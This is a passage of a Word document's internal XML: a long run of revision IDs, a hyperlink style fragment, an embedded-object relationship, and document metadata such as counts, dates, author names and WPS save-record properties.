    <w:rsid w:val="4E9E6D0A"/>
    <w:rsid w:val="4EA77955"/>
    <w:rsid w:val="4EC15FC5"/>
    <w:rsid w:val="4EE023A9"/>
    <w:rsid w:val="4EF4576E"/>
    <w:rsid w:val="4F155A4F"/>
    <w:rsid w:val="4F1634D1"/>
    <w:rsid w:val="4F336227"/>
    <w:rsid w:val="4F4F4BDD"/>
    <w:rsid w:val="4F735C80"/>
    <w:rsid w:val="4F77327D"/>
    <w:rsid w:val="4F7E0512"/>
    <w:rsid w:val="4F8F2D01"/>
    <w:rsid w:val="4F960564"/>
    <w:rsid w:val="4FB22170"/>
    <w:rsid w:val="50272390"/>
    <w:rsid w:val="50521BD4"/>
    <w:rsid w:val="505C47D9"/>
    <w:rsid w:val="50635E13"/>
    <w:rsid w:val="509D0301"/>
    <w:rsid w:val="511E4CB5"/>
    <w:rsid w:val="513D1358"/>
    <w:rsid w:val="5146436C"/>
    <w:rsid w:val="514F30C0"/>
    <w:rsid w:val="51694182"/>
    <w:rsid w:val="51785239"/>
    <w:rsid w:val="520605DB"/>
    <w:rsid w:val="52147B4A"/>
    <w:rsid w:val="522252DD"/>
    <w:rsid w:val="522668C5"/>
    <w:rsid w:val="523D1466"/>
    <w:rsid w:val="524644C3"/>
    <w:rsid w:val="524F5CF2"/>
    <w:rsid w:val="528D5C7B"/>
    <w:rsid w:val="5295559B"/>
    <w:rsid w:val="52AB3BF3"/>
    <w:rsid w:val="52B0193D"/>
    <w:rsid w:val="52C84509"/>
    <w:rsid w:val="52DE7222"/>
    <w:rsid w:val="53252976"/>
    <w:rsid w:val="53327A8E"/>
    <w:rsid w:val="534C3D5B"/>
    <w:rsid w:val="53530C46"/>
    <w:rsid w:val="537A07AD"/>
    <w:rsid w:val="5383760A"/>
    <w:rsid w:val="53CE790C"/>
    <w:rsid w:val="54242702"/>
    <w:rsid w:val="548670BA"/>
    <w:rsid w:val="54B6484A"/>
    <w:rsid w:val="54ED44E0"/>
    <w:rsid w:val="54F827B1"/>
    <w:rsid w:val="550B10E8"/>
    <w:rsid w:val="555F2FEC"/>
    <w:rsid w:val="55F703C7"/>
    <w:rsid w:val="56124737"/>
    <w:rsid w:val="56387631"/>
    <w:rsid w:val="56432AFD"/>
    <w:rsid w:val="565079AB"/>
    <w:rsid w:val="56E6209D"/>
    <w:rsid w:val="57376AD1"/>
    <w:rsid w:val="574F0F3B"/>
    <w:rsid w:val="57BB6BFD"/>
    <w:rsid w:val="58056EA2"/>
    <w:rsid w:val="58242D92"/>
    <w:rsid w:val="58641614"/>
    <w:rsid w:val="58D36385"/>
    <w:rsid w:val="58EA2A7A"/>
    <w:rsid w:val="59142A73"/>
    <w:rsid w:val="596F62C5"/>
    <w:rsid w:val="598C79BE"/>
    <w:rsid w:val="59BF48C5"/>
    <w:rsid w:val="59D81D4B"/>
    <w:rsid w:val="5A152C05"/>
    <w:rsid w:val="5A1B6236"/>
    <w:rsid w:val="5A8111AE"/>
    <w:rsid w:val="5ACD7484"/>
    <w:rsid w:val="5B0B3DCE"/>
    <w:rsid w:val="5B214990"/>
    <w:rsid w:val="5B5C4D58"/>
    <w:rsid w:val="5B8A3637"/>
    <w:rsid w:val="5BAE26C4"/>
    <w:rsid w:val="5C620B9F"/>
    <w:rsid w:val="5C6300BB"/>
    <w:rsid w:val="5CF1118F"/>
    <w:rsid w:val="5D2C5CEA"/>
    <w:rsid w:val="5D6D4FFA"/>
    <w:rsid w:val="5D845EA0"/>
    <w:rsid w:val="5DC17EF5"/>
    <w:rsid w:val="5DD451FE"/>
    <w:rsid w:val="5DD83C04"/>
    <w:rsid w:val="5E067BFA"/>
    <w:rsid w:val="5E5B752C"/>
    <w:rsid w:val="5EA507C4"/>
    <w:rsid w:val="5EA51A63"/>
    <w:rsid w:val="5EE5503B"/>
    <w:rsid w:val="5EF61161"/>
    <w:rsid w:val="5FB76A00"/>
    <w:rsid w:val="5FDD794C"/>
    <w:rsid w:val="60584F1D"/>
    <w:rsid w:val="60A4759A"/>
    <w:rsid w:val="60B105D3"/>
    <w:rsid w:val="60F44AEB"/>
    <w:rsid w:val="6173793B"/>
    <w:rsid w:val="61830E6B"/>
    <w:rsid w:val="61964B72"/>
    <w:rsid w:val="61A46B11"/>
    <w:rsid w:val="62030153"/>
    <w:rsid w:val="628E196B"/>
    <w:rsid w:val="629F6A6C"/>
    <w:rsid w:val="630E06E5"/>
    <w:rsid w:val="633F75AA"/>
    <w:rsid w:val="63546939"/>
    <w:rsid w:val="63A1188C"/>
    <w:rsid w:val="63BB7B2D"/>
    <w:rsid w:val="63EB7D15"/>
    <w:rsid w:val="644120F0"/>
    <w:rsid w:val="645D122F"/>
    <w:rsid w:val="6471446C"/>
    <w:rsid w:val="64B238B7"/>
    <w:rsid w:val="64B33C3A"/>
    <w:rsid w:val="64FF6447"/>
    <w:rsid w:val="650A75D2"/>
    <w:rsid w:val="654608F8"/>
    <w:rsid w:val="655C2C23"/>
    <w:rsid w:val="656868EF"/>
    <w:rsid w:val="65FE0EE5"/>
    <w:rsid w:val="665B47FB"/>
    <w:rsid w:val="66EA7B14"/>
    <w:rsid w:val="67232E92"/>
    <w:rsid w:val="672D4F56"/>
    <w:rsid w:val="67531912"/>
    <w:rsid w:val="677303A5"/>
    <w:rsid w:val="67A86E1E"/>
    <w:rsid w:val="67B57B22"/>
    <w:rsid w:val="67BB30D1"/>
    <w:rsid w:val="68104BA3"/>
    <w:rsid w:val="682D4F2F"/>
    <w:rsid w:val="683E0616"/>
    <w:rsid w:val="68461DD6"/>
    <w:rsid w:val="684D057F"/>
    <w:rsid w:val="6855015C"/>
    <w:rsid w:val="68CD5ACC"/>
    <w:rsid w:val="699911C9"/>
    <w:rsid w:val="69A64965"/>
    <w:rsid w:val="69C83BBA"/>
    <w:rsid w:val="6A4A3D1A"/>
    <w:rsid w:val="6A8812C9"/>
    <w:rsid w:val="6AAF133E"/>
    <w:rsid w:val="6B234F4A"/>
    <w:rsid w:val="6B285EAC"/>
    <w:rsid w:val="6B3A0868"/>
    <w:rsid w:val="6B3C7DBA"/>
    <w:rsid w:val="6B7D7572"/>
    <w:rsid w:val="6B894D7E"/>
    <w:rsid w:val="6BF6615A"/>
    <w:rsid w:val="6CCC611B"/>
    <w:rsid w:val="6CE64481"/>
    <w:rsid w:val="6CF41172"/>
    <w:rsid w:val="6D06786D"/>
    <w:rsid w:val="6D1C4347"/>
    <w:rsid w:val="6D40540A"/>
    <w:rsid w:val="6D6A50B2"/>
    <w:rsid w:val="6E6623CD"/>
    <w:rsid w:val="6EE05876"/>
    <w:rsid w:val="6EF3427B"/>
    <w:rsid w:val="6F0F4163"/>
    <w:rsid w:val="6F380483"/>
    <w:rsid w:val="6FB97C2B"/>
    <w:rsid w:val="6FC146B7"/>
    <w:rsid w:val="6FF84BF7"/>
    <w:rsid w:val="70216B9A"/>
    <w:rsid w:val="7093483C"/>
    <w:rsid w:val="70CD1B9F"/>
    <w:rsid w:val="70E37655"/>
    <w:rsid w:val="710F1337"/>
    <w:rsid w:val="711D41EA"/>
    <w:rsid w:val="712544FD"/>
    <w:rsid w:val="71444D4C"/>
    <w:rsid w:val="71520C85"/>
    <w:rsid w:val="7155560B"/>
    <w:rsid w:val="71767403"/>
    <w:rsid w:val="71833BD0"/>
    <w:rsid w:val="718E1BE3"/>
    <w:rsid w:val="71C30E32"/>
    <w:rsid w:val="71ED6B7A"/>
    <w:rsid w:val="71FC5723"/>
    <w:rsid w:val="721B72C2"/>
    <w:rsid w:val="721D4D44"/>
    <w:rsid w:val="72227C97"/>
    <w:rsid w:val="72EB0A43"/>
    <w:rsid w:val="72EC5D52"/>
    <w:rsid w:val="732B7092"/>
    <w:rsid w:val="73306A64"/>
    <w:rsid w:val="735E679E"/>
    <w:rsid w:val="73B260DF"/>
    <w:rsid w:val="73F711A6"/>
    <w:rsid w:val="74015E5E"/>
    <w:rsid w:val="746D0CF1"/>
    <w:rsid w:val="74890423"/>
    <w:rsid w:val="751C1388"/>
    <w:rsid w:val="754B2D1C"/>
    <w:rsid w:val="756E6962"/>
    <w:rsid w:val="757C4678"/>
    <w:rsid w:val="75B20CA2"/>
    <w:rsid w:val="75B361E2"/>
    <w:rsid w:val="75BE2D16"/>
    <w:rsid w:val="75D02BD6"/>
    <w:rsid w:val="75E66FE6"/>
    <w:rsid w:val="75F714AD"/>
    <w:rsid w:val="76155969"/>
    <w:rsid w:val="762A5DB3"/>
    <w:rsid w:val="76723902"/>
    <w:rsid w:val="76742AFE"/>
    <w:rsid w:val="76C57AE8"/>
    <w:rsid w:val="76E83A54"/>
    <w:rsid w:val="76F4407F"/>
    <w:rsid w:val="77171B2C"/>
    <w:rsid w:val="771D3195"/>
    <w:rsid w:val="773341A1"/>
    <w:rsid w:val="77375B0A"/>
    <w:rsid w:val="77377B75"/>
    <w:rsid w:val="77383B2B"/>
    <w:rsid w:val="77533873"/>
    <w:rsid w:val="775363CA"/>
    <w:rsid w:val="777261D1"/>
    <w:rsid w:val="779D7E32"/>
    <w:rsid w:val="77A52B1E"/>
    <w:rsid w:val="77EA6BD9"/>
    <w:rsid w:val="77F812E1"/>
    <w:rsid w:val="77FF2832"/>
    <w:rsid w:val="78370287"/>
    <w:rsid w:val="7854125C"/>
    <w:rsid w:val="786C5911"/>
    <w:rsid w:val="787926A8"/>
    <w:rsid w:val="787E4304"/>
    <w:rsid w:val="788063D1"/>
    <w:rsid w:val="78861C41"/>
    <w:rsid w:val="78E24C9B"/>
    <w:rsid w:val="79A40B9A"/>
    <w:rsid w:val="79A52828"/>
    <w:rsid w:val="79ED4FBA"/>
    <w:rsid w:val="7A245A70"/>
    <w:rsid w:val="7ADA7998"/>
    <w:rsid w:val="7AE446F6"/>
    <w:rsid w:val="7AEA791F"/>
    <w:rsid w:val="7B2524AF"/>
    <w:rsid w:val="7B257DAB"/>
    <w:rsid w:val="7B4E6B2E"/>
    <w:rsid w:val="7B644801"/>
    <w:rsid w:val="7BA27F87"/>
    <w:rsid w:val="7C560916"/>
    <w:rsid w:val="7C6B7492"/>
    <w:rsid w:val="7C7236B9"/>
    <w:rsid w:val="7C740E42"/>
    <w:rsid w:val="7C793044"/>
    <w:rsid w:val="7C8B78A5"/>
    <w:rsid w:val="7D0719AF"/>
    <w:rsid w:val="7D5F203D"/>
    <w:rsid w:val="7DA32FF7"/>
    <w:rsid w:val="7DCE3976"/>
    <w:rsid w:val="7DF97179"/>
    <w:rsid w:val="7E062BD5"/>
    <w:rsid w:val="7E4454AB"/>
    <w:rsid w:val="7E673DFD"/>
    <w:rsid w:val="7E6968BA"/>
    <w:rsid w:val="7E755EA0"/>
    <w:rsid w:val="7EC93B31"/>
    <w:rsid w:val="7ECB2594"/>
    <w:rsid w:val="7EED29D8"/>
    <w:rsid w:val="7F216FC3"/>
    <w:rsid w:val="7F24473A"/>
    <w:rsid w:val="7F761B63"/>
    <w:rsid w:val="7F8204DC"/>
    <w:rsid w:val="7FA55D66"/>
    <w:rsid w:val="7FD05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character" w:default="1" w:styleId="9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10">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="9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emf"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject1.bin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190</Words>
  <Characters>2224</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>5</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>2329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2021-10-25T01:33:00Z</dcterms:created>
  <dc:creator>Administrator</dc:creator>
  <cp:lastModifiedBy>Dog~</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-16T01:48:13Z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262E1F035CE54AE6851800C1E9647940_13</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="KSOTemplateDocerSaveRecord">
    <vt:lpwstr>eyJoZGlkIjoiNWM1MWJkNWJiY2Q1NzJmZmRlMThjOTUwZWMxNmFkZjkiLCJ1c2VySWQiOiI5MTk5NDE2ODYifQ==</vt:lpwstr>
  </property>
</Properties>
</file>